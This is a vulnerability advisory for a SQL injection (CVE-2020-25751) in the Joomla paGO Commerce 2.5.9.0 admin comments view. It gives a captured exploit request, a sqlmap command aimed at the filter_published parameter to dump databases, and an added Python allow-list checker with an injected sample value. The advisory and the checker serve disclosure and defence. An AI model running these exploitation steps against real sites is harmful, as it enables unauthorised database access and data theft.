# (CVE-2020-25751) Joomla! paGO Commerce 2.5.9.0 SQL Injection Vulnerability

I. Vulnerability Overview
-------------------------

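Joomla! is an open-source, cross-platform content management system (CMS) developed in PHP and MySQL by the Open Source Matters team in the United States.

Version 2.5.9.0 of the Joomla! paGO Commerce plugin contains a SQL injection vulnerability. The vulnerability stems from the `filter_published` parameter of `administrator/index.php?option=com_pago&view=comments`. An attacker can exploit it to execute unauthorized SQL commands.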

II. Affected Versions
---------------------

Joomla! paGO Commerce 2.5.9.0

III. Reproduction Steps
-----------------------

```http
POST /joomla/administrator/index.php HTTP/1.1
Host: www.0-sec.org:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Origin: http://localhost
Connection: close
Referer: http://www.0-sec.org/joomla/administrator/index.php?option=com_pago&view=comments
Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1
Upgrade-Insecure-Requests: 1

filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1
```

**sqlmap poc**:

`sqlmap -r www.0-sec.org --dbs --risk=3 --level=5 --random-agent -p filter_published`
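
As an added example (not from the original write-up or the paGO code base), a request-side allow-list that a reverse proxy hook or log-review script could apply to the list-filter fields in the request above. The accepted value patterns, the `violations` function name and the `joomla.example` host are assumptions generalised from the single sample request on this page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allow-list. The page shows only filter_published=1, limit=10,
# filter_order=id and filter_order_Dir=desc; the patterns generalise from those.
RULES = {
    "filter_published": re.compile(r"-?[0-9]{1,2}"),
    "limit": re.compile(r"[0-9]{1,4}"),
    "filter_order": re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,31}"),
    "filter_order_Dir": re.compile(r"asc|desc", re.IGNORECASE),
}

def violations(raw_request: str) -> list:
    """Return the names of list-filter fields whose values fail the allow-list."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    method, target, _ = head.split("\n", 1)[0].split(" ", 2)
    parts = urlsplit(target)
    if not parts.path.endswith("/administrator/index.php"):
        return []
    # Filters may arrive in the query string or the form body; check both.
    fields = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        for key, values in parse_qs(body.strip(), keep_blank_values=True).items():
            fields.setdefault(key, []).extend(values)
    bad = []
    for name, pattern in RULES.items():
        for value in fields.get(name, []):
            # Empty means "no filter"; anything else must match in full.
            # Every repeated copy of a field is checked, not just the first.
            if value and not pattern.fullmatch(value):
                bad.append(name)
                break
    return bad

# Constructed samples modelled on the request shown above.
GOOD = ("POST /joomla/administrator/index.php HTTP/1.1\r\n"
        "Host: joomla.example\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "filter_search=&limit=10&filter_published=1&controller=comments"
        "&filter_order=id&filter_order_Dir=desc")
BAD = GOOD.replace("filter_published=1", "filter_published=1%27")

if __name__ == "__main__":
    print(violations(GOOD))  # []
    print(violations(BAD))   # ['filter_published']
```

Filtering of this kind only narrows exposure; the underlying fix is for the component to cast or bind `filter_published` before it reaches the query.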

References
----------

> https://www.nmmapper.com/st/exploitdetails/48811/43057/joomla-pago-commerce-2590-sql-injection-authenticated/
